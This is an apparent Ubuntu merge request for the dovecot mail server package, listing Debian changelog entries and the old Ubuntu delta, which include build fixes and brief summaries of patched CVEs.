Merge dovecot from Debian unstable for 22.04

Upstream: 2.3.16
Debian: 1:2.3.16+dfsg1-3
Ubuntu: 1:2.3.13+dfsg1-1ubuntu3

Debian does new releases regularly, so it's likely there will be newer versions available before FF that we can pick up if this merge is done later in the cycle.

### New Debian Changes ###

dovecot (1:2.3.16+dfsg1-3) unstable; urgency=medium

  * [7b858b6] Fix FTBFS on mips(64)el. Stacktrace generation on these
    architectures requires -funwind-tables, as with 32-bit arm.

 -- Noah Meyerhans <email address hidden> Thu, 16 Sep 2021 08:41:27 -0700

dovecot (1:2.3.16+dfsg1-2) unstable; urgency=medium

  [ Christian Göttsche ]
  * [e1e9ece] d/patches: rework backtrace test patch
  * [be404bf] d/patches: add big-endian patch

 -- Noah Meyerhans <email address hidden> Fri, 10 Sep 2021 16:10:50 -0700

dovecot (1:2.3.16+dfsg1-1) unstable; urgency=medium

  [ Christian Göttsche ]
  * [ff4a227] New upstream version 2.3.14+dfsg1
  * [963fa3b] New upstream version 2.3.15+dfsg1 (Closes: #991323, #983510)
  * [5e0c898] d/watch: adjust dversionmangle for dfsg suffix
  * [9ffb0f5] d/patches: update
  * [850e1d6] New upstream version 2.3.16+dfsg1
  * [7140b87] d/patches: rebase patches
  * [fb1b77e] d/rules: enable LTO
  * [ce7055d] d/control: add libsystemd-dev dependency
  * [db93263] d/copyright: drop unused section
  * [aeec1e8] d/rules: update how to set systemdsystemunitdir
  * [ebe9709] d/patches: resolve compiler warnings
  * [19b2bb0] d/changelog: bump to 1:2.3.16+dfsg1-1
  * [58a4078] d/patches: update 32bit warnings patch

  [ Noah Meyerhans ]
  * [f217c2e] Fix indexer crash
  * [b075317] Import upstream patch for indexer crash on client disconnect
  * [36e8740] drop debian/dovecot-core.maintscript

 -- Noah Meyerhans <email address hidden> Thu, 02 Sep 2021 13:22:16 -0700

dovecot (1:2.3.13+dfsg1-2) unstable; urgency=high

  * Import upstream fixes for security issues (Closes: #990566):
    - CVE-2021-29157: Path traversal issue allowing an attacker with
      access to the local filesystem can trick OAuth2 authentication into
      using an HS256 validation key from an attacker-controlled location
    - CVE-2021-33515: Sensitive information could be redirected to an
      attacker-controlled address because of a STARTTLS command injection
      bug in the submission service

 -- Noah Meyerhans <email address hidden> Tue, 20 Jul 2021 08:05:19 -0700

dovecot (1:2.3.13+dfsg1-1) unstable; urgency=medium

  [ Christian Göttsche ]
  * [6829237] New upstream version 2.3.13 (Closes: #979363)
    - CVE-2020-24386: IMAP hibernation allows accessing other peoples mail
    - CVE-2020-25275: MIME parsing crashes with particular messages

  * [6d25736] Add libzstd-dev to build-dependencies (Closes: #969165)
  * [5956798] Rebase patches
  * [2cb63c3] Bump to standards version 4.5.1 (no further changes)
  * [548bac5] Drop unmatched copyright src/lib-ntlm/* wildcard
  * [6f33f3f] Ignore package-contains-documentation-outside-usr-share-doc
    false-positives
  * [dde9c94] Handle removed configuration file in postinst

  [ Pino Toscano ]
  * [04a60e3] d/{control,rules}: disable apparmor support on !linux archs
    (Closes: #951869)

  [ Helmut Grohne ]
  * [e5f9fcb] d/patches: improve cross-compile support (Closes: #979370)

 -- Noah Meyerhans <email address hidden> Mon, 25 Jan 2021 15:38:17 -0800

dovecot (1:2.3.11.3+dfsg1-2) unstable; urgency=medium

  [ Christian Göttsche ]
  * [44770f6] Add patch for 32bit compiler warnings
  * [053865a] Lintian: remove unused override
  * [4ece2e1] Lintian: add forwarded header to Debian specific patches
  * [67872b7] Lintian: ignore Debian only man page
  * [d30bd7e] Lintian: tag manpage-without-executable got renamed to
    spare-manual-page
  * [3bdf952] Limit libcap-dev build-dependency to linux-any
  * [28f6425] Drop acute accent in man page
  * [8c15850] Add patch allowing GSSAPI containing NULL

 -- Noah Meyerhans <email address hidden> Wed, 19 Aug 2020 12:06:07 -0700

dovecot (1:2.3.11.3+dfsg1-1) unstable; urgency=high

  * New upstream release fixes security issues (Closes: #968302)
    - CVE-2020-12100 - Receiving mail with deeply nested MIME parts leads to
      resource exhaustion as Dovecot attempts to parse it.
    - CVE-2020-12673 - Dovecot's NTLM implementation does not correctly check
      message buffer size, which leads to reading past allocation which can
      lead to crash.
    - CVE-2020-12674 - Dovecot's RPA mechanism implementation accepts
      zero-length message, which leads to assert-crash later on.

### Old Ubuntu Delta ###

dovecot (1:2.3.13+dfsg1-1ubuntu3) impish; urgency=medium

  * No-change rebuild due to OpenLDAP soname bump.

 -- Sergio Durigan Junior <email address hidden> Mon, 21 Jun 2021 17:46:46 -0400

dovecot (1:2.3.13+dfsg1-1ubuntu2) impish; urgency=medium

  * SECURITY UPDATE: incorrectly escapes kid and azp fields in JWT tokens
    - debian/patches/CVE-2021-29157.patch: improve escaping in
      src/lib-dict-extra/dict-fs.c, src/lib-oauth2/oauth2-jwt.c,
      src/lib-oauth2/test-oauth2-jwt.c.
    - CVE-2021-29157
  * SECURITY UPDATE: plaintext command injection before STARTTLS
    - debian/patches/CVE-2021-33515.patch: properly handle command queue in
      src/lib-smtp/smtp-server-cmd-starttls.c,
      src/lib-smtp/smtp-server-connection.c.
    - CVE-2021-33515

 -- Marc Deslauriers <email address hidden> Wed, 16 Jun 2021 09:02:15 -0400

dovecot (1:2.3.13+dfsg1-1ubuntu1) hirsute; urgency=medium

  * Package references hidden symbols during an LTO link. This needs further
    investigation. Until then, disable LTO.

 -- Matthias Klose <email address hidden> Tue, 30 Mar 2021 17:23:55 +0200

dovecot (1:2.3.13+dfsg1-1build1) hirsute; urgency=high

  * No change rebuild against clucene-core

 -- Balint Reczey <email address hidden> Thu, 18 Feb 2021 18:19:47 +0100